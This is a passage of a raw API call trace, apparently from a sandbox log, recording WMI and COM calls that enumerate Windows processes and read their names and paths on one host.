WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9958, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9958) returned 0x0 [0279.159] WbemDefPath:IUnknown:AddRef (This=0x5a9958) returned 0x3 [0279.159] WbemDefPath:IUnknown:Release (This=0x5a9958) returned 0x2 [0279.159] WbemDefPath:IWbemPath:SetText (This=0x5a9958, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.159] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.160] IWbemClassObject:Get (in: This=0x595c60, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c1078*=0, plFlavor=0x27c107c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="propertystep.exe", varVal2=0x0), pType=0x27c1078*=8, plFlavor=0x27c107c*=0) returned 0x0 [0279.160] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0279.160] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0279.160] IWbemClassObject:Get (in: This=0x595c60, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c1078*=8, plFlavor=0x27c107c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="propertystep.exe", varVal2=0x0), pType=0x27c1078*=8, plFlavor=0x27c107c*=0) returned 0x0 [0279.160] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0279.160] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0279.160] CoTaskMemAlloc (cb=0x4) returned 0x56fbf38 [0279.160] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fbf38, puReturned=0x27bb39c | out: apObjects=0x56fbf38*=0x595df8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595df8) returned 0x0 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.161] IUnknown:AddRef (This=0x595df8) returned 0x3 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.161] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595dfc) returned 0x0 [0279.162] IMarshal:GetUnmarshalClass (in: This=0x595dfc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.162] IUnknown:Release (This=0x595dfc) returned 0x3 [0279.162] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.162] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.162] IUnknown:QueryInterface (in: This=0x595df8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.162] IUnknown:Release (This=0x595df8) returned 0x2 [0279.162] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.162] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.162] IUnknown:QueryInterface (in: This=0x595df8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595df8) returned 0x0 [0279.162] IUnknown:AddRef (This=0x595df8) returned 0x4 [0279.162] IUnknown:Release (This=0x595df8) returned 0x3 [0279.162] IUnknown:Release (This=0x595df8) returned 0x2 [0279.162] CoTaskMemFree (pv=0x56fbf38) [0279.162] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.162] IUnknown:AddRef (This=0x595df8) returned 0x3 [0279.162] IWbemClassObject:Get (in: This=0x595df8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.163] IWbemClassObject:Get (in: This=0x595df8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.163] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0279.163] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0279.163] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.163] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.163] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.163] IUnknown:Release (This=0x500344) returned 0x1 [0279.164] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fbf38) returned 0x0 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fbf38, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.164] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fbf38, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9a38) returned 0x0 [0279.164] WbemDefPath:IUnknown:Release (This=0x56fbf38) returned 0x0 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9a38) returned 0x0 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.164] WbemDefPath:IUnknown:AddRef (This=0x5a9a38) returned 0x3 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fbf48) returned 0x0 [0279.165] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fbf48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.165] WbemDefPath:IUnknown:Release (This=0x56fbf48) returned 0x3 [0279.165] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.165] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.165] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.165] WbemDefPath:IUnknown:Release (This=0x5a9a38) returned 0x2 [0279.165] WbemDefPath:IUnknown:Release (This=0x5a9a38) returned 0x1 [0279.165] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.165] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.165] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9a38, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9a38) returned 0x0 [0279.165] WbemDefPath:IUnknown:AddRef (This=0x5a9a38) returned 0x3 [0279.165] WbemDefPath:IUnknown:Release (This=0x5a9a38) returned 0x2 [0279.165] WbemDefPath:IWbemPath:SetText (This=0x5a9a38, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.165] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.166] IWbemClassObject:Get (in: This=0x595df8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c18fc*=0, plFlavor=0x27c1900*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="condition.exe", varVal2=0x0), pType=0x27c18fc*=8, plFlavor=0x27c1900*=0) returned 0x0 [0279.166] SysStringByteLen (bstr="condition.exe") returned 0x1a [0279.166] SysStringByteLen (bstr="condition.exe") returned 0x1a [0279.166] IWbemClassObject:Get (in: This=0x595df8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27c18fc*=8, plFlavor=0x27c1900*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="condition.exe", varVal2=0x0), pType=0x27c18fc*=8, plFlavor=0x27c1900*=0) returned 0x0 [0279.166] SysStringByteLen (bstr="condition.exe") returned 0x1a [0279.166] SysStringByteLen (bstr="condition.exe") returned 0x1a [0279.166] CoTaskMemAlloc (cb=0x4) returned 0x56fbf78 [0279.166] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56fbf78, puReturned=0x27bb39c | out: apObjects=0x56fbf78*=0x595f90, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595f90) returned 0x0 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.167] IUnknown:AddRef (This=0x595f90) returned 0x3 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.167] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595f94) returned 0x0 [0279.167] IMarshal:GetUnmarshalClass (in: This=0x595f94, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.168] IUnknown:Release (This=0x595f94) returned 0x3 [0279.168] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.168] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.168] IUnknown:QueryInterface (in: This=0x595f90, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.168] IUnknown:Release (This=0x595f90) returned 0x2 [0279.168] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.168] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.168] IUnknown:QueryInterface (in: This=0x595f90, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595f90) returned 0x0 [0279.168] IUnknown:AddRef (This=0x595f90) returned 0x4 [0279.168] IUnknown:Release (This=0x595f90) returned 0x3 [0279.168] IUnknown:Release (This=0x595f90) returned 0x2 [0279.168] CoTaskMemFree (pv=0x56fbf78) [0279.168] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.168] IUnknown:AddRef (This=0x595f90) returned 0x3 [0279.169] IWbemClassObject:Get (in: This=0x595f90, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.169] IWbemClassObject:Get (in: This=0x595f90, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.169] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x66 [0279.169] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x66 [0279.169] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.169] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.169] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.169] IUnknown:Release (This=0x500344) returned 0x1 [0279.170] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56fbf78) returned 0x0 [0279.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x56fbf78, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.170] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56fbf78, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9b18) returned 0x0 [0279.171] WbemDefPath:IUnknown:Release (This=0x56fbf78) returned 0x0 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9b18) returned 0x0 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.171] WbemDefPath:IUnknown:AddRef (This=0x5a9b18) returned 0x3 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.171] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9b18, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56fbf88) returned 0x0 [0279.171] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56fbf88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, 